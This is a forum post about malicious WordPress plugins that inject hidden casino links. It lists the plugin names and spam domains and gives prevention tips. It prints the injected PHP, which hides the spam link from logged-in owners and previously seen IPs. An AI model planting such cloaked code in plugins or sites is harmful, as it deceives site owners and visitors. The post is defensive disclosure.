The link is caused by a malicious WordPress plugin downloaded directly from wordpress.org. The attacker just keeps creating new plugins after they get banned. However, if you use any of the following plugins;
seo-cheese
g-translate (note the hyphen - other versions are fine)
seo-interlinking
return-to-top
google-maps-by-daniel-martyn
I would strongly recommend they should be removed immediately as they are all operated by the same hacker and insert these dodgy links to the top of your page. If not - I would love to know which plugins you have so I can investigate and report the malicious plugin to wordpress.org.
Useful reading for information about the same attack
http://wordpress.org/support/topic/strange-link-to-casino-online-appeared-at-the-top-of-my-blog
http://wordpress.org/support/topic/random-casino-link-has-appeared-on-my-wordpress-site
http://www.techyduck.com/web-design-developments/wordpress-site-hacked-showing-httponline-casino-blog-ca-in-header/
Malicious code (this is normally found in plugin directory -> setup.php or install.php)
Code: Select all
<?php
if (is_user_logged_in()) { $loggedin = 'yes'; } else { $loggedin = 'no'; }
if ($loggedin == 'no') {
$ip = $_SERVER['REMOTE_ADDR'];
$filename = $_SERVER['DOCUMENT_ROOT'] . '/wp-content/plugins/seo-cheese/created.txt';
$handle = fopen($filename, "r");
$contents = fread($handle, filesize($filename));
fclose($handle);
$filestring= $contents;
$findme = $ip;
$pos = strpos($filestring, $findme);
if ($pos === false) {
?>
<p align="center"><a href="http://online-casino.blog.ca">http://online-casino.blog.ca</a></p>
<?php //
} else {
echo '';
}}
?>
The following sites are linked to the same hacker and listing them here will hopefully help other people who have the same issue.
bet.sitonline.it/
co09778.wix.com/
honline-casino.en.softonic.com/
online-casino.blog.ca/
online-casino.us.org/
onlinecasino-games.com/online-roulette/
onlinecasino-games.com/
http://www.bettingwebs.co.uk/
http://www.concierto92uno.com/
http://www.games-casino.us/
http://www.happy-wheels.me/
http://www.templatewordpress.org/bet365-uk/
http://www.tumeplaiscoco.com/
http://www.bingo-sites.org.uk
skybet.webeden.co.uk
betfree.oneminutesite.it
http://bet365.bestonlinecasino.pw
bonus.uk.net
Other information about this hack
The trick works well because as you have found, the link itself is not visible to the site owner as firstly, it doesn't show if you are logged in to your own site, and secondly it also keeps a log of all past IP addresses that successfully logged in before and hides the link (read source code above for details on this).
Hack prevention
Be very cautious of new plugins on wordpress.org as it seems they are not adequately checked (perhaps initially but the plugin creator can easily modify the code with new versions). Trust only plugins that have more popularity and read though the comments and ratings.
If you think you have this issue on your site, a very quick way to find out is to try running you site in safe mode to temporarily disable plugins (just add '
?safe_mode=1' to your URL while logged in).
(noob I)
